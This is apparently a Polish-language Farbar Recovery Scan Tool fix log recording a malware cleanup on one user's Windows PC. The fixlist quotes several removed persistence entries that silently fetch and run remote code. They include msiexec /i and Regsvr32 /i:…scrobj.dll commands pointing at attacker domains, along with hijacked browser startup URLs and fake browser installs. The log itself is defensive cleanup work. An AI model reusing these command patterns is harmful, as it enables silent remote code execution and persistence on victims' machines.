Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 26-04-2017 Uruchomiony przez Arczi (27-04-2017 07:22:13) Run:1 Uruchomiony z C:\Users\Arczi\Desktop\Nowy folder Załadowane profile: Arczi (Dostępne profile: Arczi) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== /q CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=PL&userid=fcbbdada-8d0f-4e30-81d6-78bc5b3f5fb7&affid=113129&searchtype=hp&babsrc=lnkry","hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki","hxxp://www.omniboxes.com/?type=hp&ts=1453675607&z=ba7d726f9838c2429ec3b41gaz6w9cfq2m5wbq7efm&from=amt&uid=wdcxwd10jpcx-24ue4t0_wd-wxm1e83vhj92vhj92" HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Users\Arczi\AppData\Local\Boxbob R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Local\Firefox R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [Brak podpisu cyfrowego] <==== UWAGA U3 kxldrpob; \??\C:\Users\Arczi\AppData\Local\Temp\kxldrpob.sys [X] <==== UWAGA HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) <==== UWAGA Task: {39AB3992-685C-4C43-BF2B-267874318720} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== scrobj.dll Task: {BCA1E17D-E930-47CC-A8D9-AF0F275A907B} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{28F4CBD1-61EB-4D72-B858-FD0972534239}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe FirewallRules: [{C5F00FDE-B5CF-49D8-8B76-81C27025C315}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F6C7D29A-DFC8-45CD-8919-1056F46D94F2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Arczi\AppData\Local\Mozilla C:\Users\Arczi\AppData\Roaming\Mozilla C:\Users\Arczi\AppData\Roaming\Profiles EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto Chrome StartupUrls => pomyślnie usunięto HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto "C:\Program Files (x86)\Boxbob" => pomyślnie usunięto. "C:\Users\Arczi\AppData\Local\Boxbob" => pomyślnie usunięto. HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. "C:\Users\Arczi\AppData\Roaming\Firefox" => pomyślnie usunięto. "C:\Users\Arczi\AppData\Local\Firefox" => pomyślnie usunięto. HKLM\System\CurrentControlSet\Services\WindowsOfficeSrv => klucz pomyślnie usunięto WindowsOfficeSrv => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\kxldrpob => klucz pomyślnie usunięto kxldrpob => serwis pomyślnie usunięto HKU\S-1-5-21-1625667741-3387903260-1302171998-1001_Classes\ChromeHTML => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{39AB3992-685C-4C43-BF2B-267874318720} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{39AB3992-685C-4C43-BF2B-267874318720} => klucz pomyślnie usunięto C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BCA1E17D-E930-47CC-A8D9-AF0F275A907B} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BCA1E17D-E930-47CC-A8D9-AF0F275A907B} => klucz pomyślnie usunięto C:\WINDOWS\System32\Tasks\T0528 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => klucz pomyślnie usunięto C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{28F4CBD1-61EB-4D72-B858-FD0972534239} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C5F00FDE-B5CF-49D8-8B76-81C27025C315} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F6C7D29A-DFC8-45CD-8919-1056F46D94F2} => Wartość pomyślnie usunięto C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz nie znaleziono. HKCU\Software\MozillaPlugins => klucz nie znaleziono. HKLM\SOFTWARE\Mozilla => klucz nie znaleziono. HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto "C:\Users\Arczi\AppData\Local\Mozilla" => nie znaleziono. C:\Users\Arczi\AppData\Roaming\Mozilla => pomyślnie przeniesiono "C:\Users\Arczi\AppData\Roaming\Profiles" => nie znaleziono. =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 76717219 B Java, Flash, Steam htmlcache => 506 B Windows/system/drivers => 620430958 B Edge => 88921171 B Chrome => 105929077 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 232 B systemprofile32 => 0 B LocalService => 11602 B NetworkService => 17680 B Arczi => 1255701434 B RecycleBin => 0 B EmptyTemp: => 2 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 07:25:46 ====